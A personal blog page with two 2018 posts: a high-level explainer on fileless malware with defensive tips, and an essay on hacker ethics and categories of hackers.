Thursday, 26 April 2018

Finding Security Against Invisible Malware

Image result for malwareImage result for malwareImage result for malware

We live in a world of possibilities! The Good, the bad, and the ugly anything can happen.
While innovators at Google are working hard to make it easy and safe for people to move around using driverless cars or self-driving cars, hackers, on the other hand, are already making life difficult for people hacking computer systems and stealing their personal and sensitive data using a similar logic – Fileless malware.
Used synonymously with Non-malware or zero footprint malware, Fileless malware has been in existence for many years now; however, as hackers constantly try to use deceptive methods to infiltrate and attack computer systems and networks, this sophisticated technology is becoming increasingly popular in the recent times.
Unlike a traditional malware attack, which requires a code to be written on the hard disk, Zero footprint malware attack uses no code, but legitimate system assets and trusted processes such as memory, PowerShell, etc., to infect victim’s machine. As these are highly trusted processes, most anti-virus software does not even scan them.  Thus offering, an easy and convenient way for hackers to go un-detected hiding behind the trusted process. Also known as, “Living off the Land,” this malware offers more stealth and effectiveness to an attack, and therefore hackers are increasingly using this method to perform their nefarious activities.
A recent study by Ponemon Institute reveals that in the year 2016, about 9% of attacks used this method, which grew to 29% in 2017, and is expected to increase to 35% in the year 2018 significantly raising the alert levels for both individuals and businesses. As non-file malware offers ten times better success rate, hackers are relying on this method to attack computer networks. 
With these types of security attacks on the rise, individuals and businesses need to educate themselves on the style of attacks, and incident response options available to them.
How does a Fileless malware attack take place?
After clicking on a cleverly disguised spam message, the user is taken to a webpage that downloads flash; flash with many vulnerabilities is the preferred choice of smart hackers to infect systems.  
Hackers then use Flash to access PowerShell and send instructions, operating just from computer’s memory, through the command line to download malicious PowerShell script, which collects sensitive data and sends it back to the attacker.
Symptoms of a File less malware Attack
Without a file installed on the computer, even the traditional security tools may find it difficult to detect the presence of a Non-file malware on your computer. However, some warning signs your computer or network displays when infected with an invisible malware include weird network behaviors, computer attempting to connect to botnet servers, etc.
Safeguards against Zero footprint malware attacks
Prevention is better than cure. Identifying an attack in the early stages may help mitigate the risk, here are some steps that help prevent an attack or reduce the damage in the event of an attack.
  • As hackers use existing system resources, to attack your computer, disabling those systems, and process when not in use is an option available to users. Disable PowerShell, Macros, Windows Management Instrumentation, if you are not using them.
  • Always keep the software and patches current and up to date.
  • Constantly monitor security, network, and activity logs
  • Grant privileges and access carefully to credible users
  • Monitor system’s behavior patterns regularly.

    at No comments:

    Monday, 23 April 2018

    The Hacker Code of Ethics

    Image result for hacker ethicsImage result for hacker ethics

    Cyber-terrorists were once hackers, and maybe that’s why the media treat them like that. But if they were, why are not they anymore?
    Every hacker has a strict code of ethics, where he tries to always differentiate between right and wrong, from the moment that code is ignored and his actions become destructive, that individual can no longer be considered a hacker by the community.
    To better understand this code of ethics knows the three pillars in the hacker community: Collaboration, Knowledge, Freedom.
    A hacker who stood out and is considered one of the most excellent hackers of the twentieth century, Richard Stallman, his ethics is based on the three pillars, which were also the basis for the creation of the Free Software Foundation, Copyleft, and free software.
    When a hacker loses his ethics, we move into a sub-division of this narrow hierarchy. Many are imagining that he will be turning into a Cracker, but it is not so, even within the hacker classification there are two sub-types, while we can call someone hacker he is a white hat, he uses his ethics as a guide. When a hacker loses this ethic he is considered a black hat, in that case, he uses his knowledge and his unique way of thinking without using any code of ethics, performing actions for his benefit, espionage or even fun.
    Crackers are people in the hacker community who specialize in code-breaking, those who break password hashes and program protection keys.
    In the community, we also have the so-called Social Engineer who uses non-technical means to obtain privileged information. He is usually a master at deceiving and deceiving people.
    Scammers: Fraud, which uses some flaws common programs such as IE and a bit of social engineering to send lay users to fake sites with the goal of capturing access passwords etc.
    Script Kiddie: This guy has no in-depth knowledge or defined targets. Uses the internet for scripts ready to make their attacks. For kiddies, what matters is the number of sites that invade, not the quality. Thus, they “scratch” thousands of websites every day, changing significant web pages of some small business, sometimes actually accessing essential files.
    Defacer: Script Kiddie that only cares about replacing the main page of any website.
    Lammer: Script Kiddie with little knowledge, but posing as a “technology guru.” These are up in the IT market.
    When it comes to hacker ethics and history, I always get two pictures:
    Cathedral Method
    • Ken Thompson and Dennis Ritchie (Unix)
    • Donald E. Knuth (TeX, MetaFont)
    • Richard Stallman (GNU Project, FSF, GPL license, gcc, emacs, …)
    Bazaar Method
    • Linus Torvalds, inventor, and first Linux kernel implementer
    • Bruce Parens, one of the first coordinators of the Debian project
    For all lovers of information security, here is must-read: https://bit.ly/14JwODI
    From the year 1980 to the present day, the internet has evolved very, very fast. Today it is possible to have access to quality information quickly. Just a matter of decision, about what you want for your life. I found some great free courses here at Cybrary. This is fantastic!
    This article is for beginners and curious. For beginners, I recommend doing some basic courses in the Security area.
    Here are some links that came to mind when writing this blog:
    Security Conferences:
    Videos:
    • https://www.youtube.com/watch?v=o8NPllzkFhE
    Fun:

    at No comments:
    Subscribe to: Comments (Atom)

    AN OFFICER AND A SPY – ROBERT HARRIS SUMMARY WRITTEN BY-SURYA PRAKASH PATTANAYAK This novel was written by Robert Harris. It has w...

    • (no title)
      Ways to Transfer Contact List from Excel to Android Phone Lots of time users face a situation to which they have no solutions. These a...
    • (no title)
      How to See Who You are Most Connected to on Facebook Two Methods: Determining Your Closest Friends Examining the Source Code If you...
    • Installation of Matlab 2014a FOR FREE
      Installation of Matlab 2014a FOR FREE This tutorial will help the student to install the Matlab 2014a without paying money, so cal...